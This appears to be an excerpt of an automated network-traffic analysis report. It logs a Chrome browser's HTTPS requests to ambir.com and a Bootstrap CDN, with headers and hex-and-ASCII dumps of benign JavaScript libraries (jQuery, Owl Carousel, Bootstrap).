                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 74 72 79 7b 72 65 74 75 72 6e 20 54 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 3a 68 61 73 28 2a 2c 3a 6a 71 66 61 6b 65 29 22 29 2c 21 31 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 7d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 4f 2c 50 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 43 29 7b 76 61 72 20 6e 3d 74
                                                                                                                                                                                              Data Ascii: try{return T.querySelector(":has(*,:jqfake)"),!1}catch(e){return!0}}),le.getById?(b.filter.ID=function(e){var t=e.replace(O,P);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&C){var n=t
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 65 6e 67 74 68 7c 7c 64 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 64 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 28 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75
                                                                                                                                                                                              Data Ascii: ength||d.push(":checked"),(t=T.createElement("input")).setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),r.appendChild(e).disabled=!0,2!==e.querySelectorAll(":disabled").length&&d.push(":enabled",":disabled"),(t=T.createElement("inpu
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 75 74 65 28 74 29 7d 2c 49 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 64 20 65 78 70 72 65 73 73 69 6f 6e 3a 20 22 2b 65 29 7d 2c 63 65 2e 75 6e 69 71 75 65 53 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 30 2c 69 3d 30 3b 69 66 28 61 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 2c 6f 3d 21 6c 65 2e 73 6f 72 74 53 74 61 62 6c 65 26 26 61 65 2e 63 61 6c 6c 28 65 2c 30 29 2c 64 65 2e 63 61 6c 6c 28 65 2c 6c 29 2c 61 29 7b 77 68 69 6c 65 28 74 3d 65 5b 69 2b 2b 5d 29 74 3d 3d 3d 65 5b 69 5d 26 26 28 72 3d 6e 2e 70 75 73 68 28 69 29 29 3b 77 68 69 6c 65 28 72 2d 2d 29 68 65 2e 63
                                                                                                                                                                                              Data Ascii: ute(t)},I.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ce.uniqueSort=function(e){var t,n=[],r=0,i=0;if(a=!le.sortStable,o=!le.sortStable&&ae.call(e,0),de.call(e,l),a){while(t=e[i++])t===e[i]&&(r=n.push(i));while(r--)he.c


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              13192.168.2.549727141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:17 UTC569OUTGET /wp-content/themes/ambir/js/owl.carousel.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:17 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:17 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              ETag: W/"651c3a0e-ad36"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13805
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f817d7c7d0b-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:17 UTC878INData Raw: 37 64 63 36 0d 0a 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 62 2c 63 29 7b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2e 44
                                                                                                                                                                                              Data Ascii: 7dc6/** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE */!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.D
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 73 2e 5f 70 6c 75 67 69 6e 73 5b 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 61 2e 73 6c 69 63 65 28 31 29 5d 3d 6e 65 77 20 62 28 74 68 69 73 29 7d 2c 74 68 69 73 29 29 2c 61 2e 65 61 63 68 28 65 2e 57 6f 72 6b 65 72 73 2c 61 2e 70 72 6f 78 79 28 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 5f 70 69 70 65 2e 70 75 73 68 28 7b 66 69 6c 74 65 72 3a 63 2e 66 69 6c 74 65 72 2c 72 75 6e 3a 61 2e 70 72 6f 78 79 28 63 2e 72 75 6e 2c 74 68 69 73 29 7d 29 7d 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 73 65 74 75 70 28 29 2c 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 7d 65 2e 44 65 66 61 75 6c 74 73 3d 7b 69 74 65 6d 73 3a 33 2c 6c 6f 6f 70 3a 21 31 2c 63 65 6e 74 65 72 3a 21 31 2c 72 65 77 69 6e 64 3a 21 31 2c 63
                                                                                                                                                                                              Data Ascii: s._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({filter:c.filter,run:a.proxy(c.run,this)})},this)),this.setup(),this.initialize()}e.Defaults={items:3,loop:!1,center:!1,rewind:!1,c
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 2e 73 65 74 74 69 6e 67 73 2e 61 75 74 6f 57 69 64 74 68 2c 64 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 74 6c 2c 65 3d 7b 77 69 64 74 68 3a 22 61 75 74 6f 22 2c 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 3a 64 3f 62 3a 22 22 2c 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 3a 64 3f 22 22 3a 62 7d 3b 21 63 26 26 74 68 69 73 2e 24 73 74 61 67 65 2e 63 68 69 6c 64 72 65 6e 28 29 2e 63 73 73 28 65 29 2c 61 2e 63 73 73 3d 65 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 28 74 68 69 73 2e 77 69 64 74 68 28 29 2f 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 74 65 6d 73 29 2e 74 6f 46 69 78 65 64 28 33 29 2d 74 68 69 73 2e 73
                                                                                                                                                                                              Data Ascii: .settings.autoWidth,d=this.settings.rtl,e={width:"auto","margin-left":d?b:"","margin-right":d?"":b};!c&&this.$stage.children().css(e),a.css=e}},{filter:["width","items","settings"],run:function(a){var b=(this.width()/this.settings.items).toFixed(3)-this.s
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 64 74 68 3a 4d 61 74 68 2e 63 65 69 6c 28 4d 61 74 68 2e 61 62 73 28 62 5b 62 2e 6c 65 6e 67 74 68 2d 31 5d 29 29 2b 32 2a 61 2c 22 70 61 64 64 69 6e 67 2d 6c 65 66 74 22 3a 61 7c 7c 22 22 2c 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 3a 61 7c 7c 22 22 7d 3b 74 68 69 73 2e 24 73 74 61 67 65 2e 63 73 73 28 63 29 7d 7d 2c 7b 66 69 6c 74 65 72 3a 5b 22 77 69 64 74 68 22 2c 22 69 74 65 6d 73 22 2c 22 73 65 74 74 69 6e 67 73 22 5d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 5f 63 6f 6f 72 64 69 6e 61 74 65 73 2e 6c 65 6e 67 74 68 2c 63 3d 21 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 61 75 74 6f 57 69 64 74 68 2c 64 3d 74 68 69 73 2e 24 73 74 61 67 65 2e 63 68 69 6c 64 72 65 6e 28 29 3b 69 66 28 63 26 26 61 2e 69 74 65
                                                                                                                                                                                              Data Ascii: dth:Math.ceil(Math.abs(b[b.length-1]))+2*a,"padding-left":a||"","padding-right":a||""};this.$stage.css(c)}},{filter:["width","items","settings"],run:function(a){var b=this._coordinates.length,c=!this.settings.autoWidth,d=this.$stage.children();if(c&&a.ite
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 67 65 2e 63 68 69 6c 64 72 65 6e 28 29 2e 65 71 28 74 68 69 73 2e 63 75 72 72 65 6e 74 28 29 29 2e 61 64 64 43 6c 61 73 73 28 22 63 65 6e 74 65 72 22 29 7d 7d 5d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 69 61 6c 69 7a 65 53 74 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 24 73 74 61 67 65 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 22 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 43 6c 61 73 73 29 2c 74 68 69 73 2e 24 73 74 61 67 65 2e 6c 65 6e 67 74 68 7c 7c 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 64 64 43 6c 61 73 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 69 6e 67 43 6c 61 73 73 29 2c 74 68 69 73 2e 24 73 74 61 67 65 3d 61 28 22 3c 22 2b 74 68 69 73 2e 73 65 74 74 69 6e
                                                                                                                                                                                              Data Ascii: ge.children().eq(this.current()).addClass("center")}}],e.prototype.initializeStage=function(){this.$stage=this.$element.find("."+this.settings.stageClass),this.$stage.length||(this.$element.addClass(this.options.loadingClass),this.$stage=a("<"+this.settin
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 64 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 68 65 63 6b 56 69 73 69 62 69 6c 69 74 79 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 75 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 76 69 65 77 70 6f 72 74 28 29 2c 63 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 70 6f 6e 73 69 76 65 2c 64 3d 2d 31 2c 65 3d 6e 75 6c 6c 3b 63 3f 28 61 2e 65 61 63 68 28 63 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3c 3d 62 26 26 61 3e 64 26 26 28 64 3d 4e 75 6d 62 65 72 28 61 29 29 7d 29 2c 65 3d 61 2e 65 78 74 65 6e
                                                                                                                                                                                              Data Ascii: d")},e.prototype.isVisible=function(){return!this.settings.checkVisibility||this.$element.is(":visible")},e.prototype.setup=function(){var b=this.viewport(),c=this.options.responsive,d=-1,e=null;c?(a.each(c,function(a){a<=b&&a>d&&(d=Number(a))}),e=a.exten
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 77 69 64 74 68 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 73 77 69 74 63 68 28 61 3d 61 7c 7c 65 2e 57 69 64 74 68 2e 44 65 66 61 75 6c 74 29 7b 63 61 73 65 20 65 2e 57 69 64 74 68 2e 49 6e 6e 65 72 3a 63 61 73 65 20 65 2e 57 69 64 74 68 2e 4f 75 74 65 72 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 77 69 64 74 68 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 77 69 64 74 68 2d 32 2a 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 73 74 61 67 65 50 61 64 64 69 6e 67 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6d 61 72 67 69 6e 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 74 65 72 28 22 72 65 66 72 65 73 68 69 6e 67 22 29 2c
                                                                                                                                                                                              Data Ascii: ")},e.prototype.width=function(a){switch(a=a||e.Width.Default){case e.Width.Inner:case e.Width.Outer:return this._width;default:return this._width-2*this.settings.stagePadding+this.settings.margin}},e.prototype.refresh=function(){this.enter("refreshing"),
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 2e 63 6f 72 65 20 73 65 6c 65 63 74 73 74 61 72 74 2e 6f 77 6c 2e 63 6f 72 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 31 7d 29 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 74 6f 75 63 68 44 72 61 67 26 26 28 74 68 69 73 2e 24 73 74 61 67 65 2e 6f 6e 28 22 74 6f 75 63 68 73 74 61 72 74 2e 6f 77 6c 2e 63 6f 72 65 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6f 6e 44 72 61 67 53 74 61 72 74 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 24 73 74 61 67 65 2e 6f 6e 28 22 74 6f 75 63 68 63 61 6e 63 65 6c 2e 6f 77 6c 2e 63 6f 72 65 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 6f 6e 44 72 61 67 45 6e 64 2c 74 68 69 73 29 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 44 72 61 67 53 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72
                                                                                                                                                                                              Data Ascii: .core selectstart.owl.core",function(){return!1})),this.settings.touchDrag&&(this.$stage.on("touchstart.owl.core",a.proxy(this.onDragStart,this)),this.$stage.on("touchcancel.owl.core",a.proxy(this.onDragEnd,this)))},e.prototype.onDragStart=function(b){var
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 65 6e 63 65 28 74 68 69 73 2e 5f 64 72 61 67 2e 70 6f 69 6e 74 65 72 2c 74 68 69 73 2e 70 6f 69 6e 74 65 72 28 61 29 29 2c 66 3d 74 68 69 73 2e 64 69 66 66 65 72 65 6e 63 65 28 74 68 69 73 2e 5f 64 72 61 67 2e 73 74 61 67 65 2e 73 74 61 72 74 2c 65 29 3b 74 68 69 73 2e 69 73 28 22 64 72 61 67 67 69 6e 67 22 29 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6c 6f 6f 70 3f 28 62 3d 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 29 2c 63 3d 74 68 69 73 2e 63 6f 6f 72 64 69 6e 61 74 65 73 28 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 2b 31 29 2d 62 2c 66 2e 78 3d 28 28 66 2e 78 2d 62 29 25 63 2b 63 29 25 63 2b 62 29 3a 28 62 3d 74 68 69 73 2e 73 65 74 74
                                                                                                                                                                                              Data Ascii: ence(this._drag.pointer,this.pointer(a)),f=this.difference(this._drag.stage.start,e);this.is("dragging")&&(a.preventDefault(),this.settings.loop?(b=this.coordinates(this.minimum()),c=this.coordinates(this.maximum()+1)-b,f.x=((f.x-b)%c+c)%c+b):(b=this.sett
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 26 26 62 3e 69 2d 66 26 26 62 3c 69 2b 66 3f 65 3d 61 3a 22 72 69 67 68 74 22 3d 3d 3d 63 26 26 62 3e 69 2d 67 2d 66 26 26 62 3c 69 2d 67 2b 66 3f 65 3d 61 2b 31 3a 74 68 69 73 2e 6f 70 28 62 2c 22 3c 22 2c 69 29 26 26 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 68 5b 61 2b 31 5d 21 3d 3d 64 3f 68 5b 61 2b 31 5d 3a 69 2d 67 29 26 26 28 65 3d 22 6c 65 66 74 22 3d 3d 3d 63 3f 61 2b 31 3a 61 29 2c 2d 31 3d 3d 3d 65 7d 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6c 6f 6f 70 7c 7c 28 74 68 69 73 2e 6f 70 28 62 2c 22 3e 22 2c 68 5b 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 5d 29 3f 65 3d 62 3d 74 68 69 73 2e 6d 69 6e 69 6d 75 6d 28 29 3a 74 68 69 73 2e 6f 70 28 62 2c 22 3c 22 2c 68 5b 74 68 69 73 2e 6d 61 78 69 6d 75 6d 28 29 5d 29 26 26 28
                                                                                                                                                                                              Data Ascii: &&b>i-f&&b<i+f?e=a:"right"===c&&b>i-g-f&&b<i-g+f?e=a+1:this.op(b,"<",i)&&this.op(b,">",h[a+1]!==d?h[a+1]:i-g)&&(e="left"===c?a+1:a),-1===e},this)),this.settings.loop||(this.op(b,">",h[this.minimum()])?e=b=this.minimum():this.op(b,"<",h[this.maximum()])&&(


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              14192.168.2.549729104.18.10.2074431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:17 UTC382OUTGET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                                              Host: maxcdn.bootstrapcdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:17 UTC966INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:17 GMT
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              CDN-PullZone: 252412
                                                                                                                                                                                              CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31919000
                                                                                                                                                                                              ETag: W/"5869c96cc8f19086aee625d670d741f9"
                                                                                                                                                                                              Last-Modified: Mon, 25 Jan 2021 22:04:00 GMT
                                                                                                                                                                                              CDN-ProxyVer: 1.04
                                                                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                                                                              CDN-RequestPullCode: 200
                                                                                                                                                                                              CDN-CachedAt: 09/24/2024 09:00:39
                                                                                                                                                                                              CDN-EdgeStorageId: 1068
                                                                                                                                                                                              timing-allow-origin: *
                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              CDN-Status: 200
                                                                                                                                                                                              CDN-RequestTime: 0
                                                                                                                                                                                              CDN-RequestId: cac32d9ab322709d2e33090c1abfb003
                                                                                                                                                                                              CDN-Cache: HIT
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 993411
                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f826ea4439a-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:17 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 66 6e
                                                                                                                                                                                              Data Ascii: 7bed/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 20 31 2e 39 2e 31 20 6f 72 20 68 69 67 68 65 72 2c 20 62 75 74 20 6c 6f 77 65 72 20 74 68 61 6e 20 76 65 72 73 69 6f 6e 20 34 22 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 6f 74 73 74 72 61 70 22 29 2c 62 3d 7b 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 3a 22 77 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 4d 6f 7a 54 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 4f 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 20 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 74 72 61 6e
                                                                                                                                                                                              Data Ascii: 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",tran
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 67 67 65 72 28 62 3d 61 2e 45 76 65 6e 74 28 22 63 6c 6f 73 65 2e 62 73 2e 61 6c 65 72 74 22 29 29 2c 62 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 28 67 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6e 22 29 2c 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 26 26 67 2e 68 61 73 43 6c 61 73 73 28 22 66 61 64 65 22 29 3f 67 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 63 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 64 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 3a 63 28 29 29 7d 3b 76 61 72 20 65 3d 61 2e 66 6e 2e 61 6c 65 72 74 3b 61 2e 66 6e 2e 61 6c 65 72 74 3d 62 2c 61 2e 66 6e 2e 61 6c 65 72 74 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 64 2c 61 2e 66
                                                                                                                                                                                              Data Ascii: gger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.f
